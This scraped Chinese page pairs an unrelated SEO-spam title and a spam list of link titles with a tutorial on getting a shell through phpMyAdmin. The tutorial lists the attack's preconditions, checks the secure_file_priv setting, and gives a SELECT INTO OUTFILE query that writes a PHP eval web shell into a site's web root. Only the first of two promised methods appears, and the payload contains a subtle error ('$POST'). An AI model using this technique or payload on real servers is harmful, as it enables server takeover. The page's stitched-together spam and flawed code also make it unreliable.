当前位置: 首页 > news >正文

微信怎么做网站龙岗网站设计

微信怎么做网站,龙岗网站设计,网站建设费用应该入什么科目,门户网站开发源代码0x00 前言 来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secure_file…

0x00 前言

来到phpmyadmin页面后如何getshell呢?下面介绍两种方法

0x01 select into outfile直接写入

1、利用条件

  • 对web目录需要有写权限能够使用单引号(root)

  • 知道网站绝对路径(phpinfo/php探针/通过报错等)

  • secure_file_priv没有具体值

2、查看secure_file_priv值

show global variables like '%secure%';

关于secure_file_priv配置介绍:

secure_file_priv 是用来限制 load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限

当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权

我这里的secure_file_priv值为NULL,所以不能够导入或导出

secure_file_priv这个值是只读变量,只能通过配置文件修改。如果管理员没有配置,那么我们是无法进行写入shell的,这里我为了测试能否写入修改一下

在MySQL的配置文件my.ini中进行配置:

修改后secure_file_priv的值如图所示:

3、写入一句话

select '<?php @eval($POST[1]); ?>' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'

这里需要注意的一个点是路径需要用"\\"

查看下根目录

http://www.khdw.cn/news/22702.html

相关文章:

  • 昆明网站建设优化深圳seo优化推广公司
  • 南京网站开发荐南京乐识长沙seo网络推广
  • jsp网站开发实例视频深圳网站建设系统
  • 做我女朋友吧网站nba总得分排行榜最新
  • 外贸网站建设评价seo排名第一的企业
  • 武汉营销型企业网站开发seo职位描述
  • 什么网站可以做高三英语试题热门推广软件
  • 网站建设大体包含河南关键词优化搜索
  • 网站建设 太原北京网站推广公司
  • 网站开发大牛带佣金的旅游推广平台有哪些
  • 做动态表情包的网站网站建设平台软件
  • 在 wordpress 本地安装 wordpress标题seo是什么意思
  • 江苏省备案网站石家庄疫情
  • 福州免费做网站运营推广的方式和渠道有哪些
  • 做网站网站制作如何给企业做网络推广
  • 企业网站的网络营销seocms
  • 什么是网站链接优化百度推广天津总代理
  • 苏中建设官方网站郑州发布最新通告
  • 优化网站排名方法教程网站制作流程图
  • 鸿邑科技 网站建设网站查询域名解析
  • 做非法网站线上销售平台有哪些
  • 一个专业做设计的网站设计公司企业网站
  • 大连网站制做公司百度网站登录入口
  • 四川盼之网络科技官网长沙百度seo
  • 怎么做网站的后台管理系统优化设计官网
  • 福州做网站建设上海搜索排名优化
  • 广州有什么好玩的旅游景点长沙电商优化
  • 酱香拿铁采取了哪些网络营销方式关键词优化怎么做
  • 图片制作动图seo门户网站优化
  • 真人做爰直播网站新公司如何做推广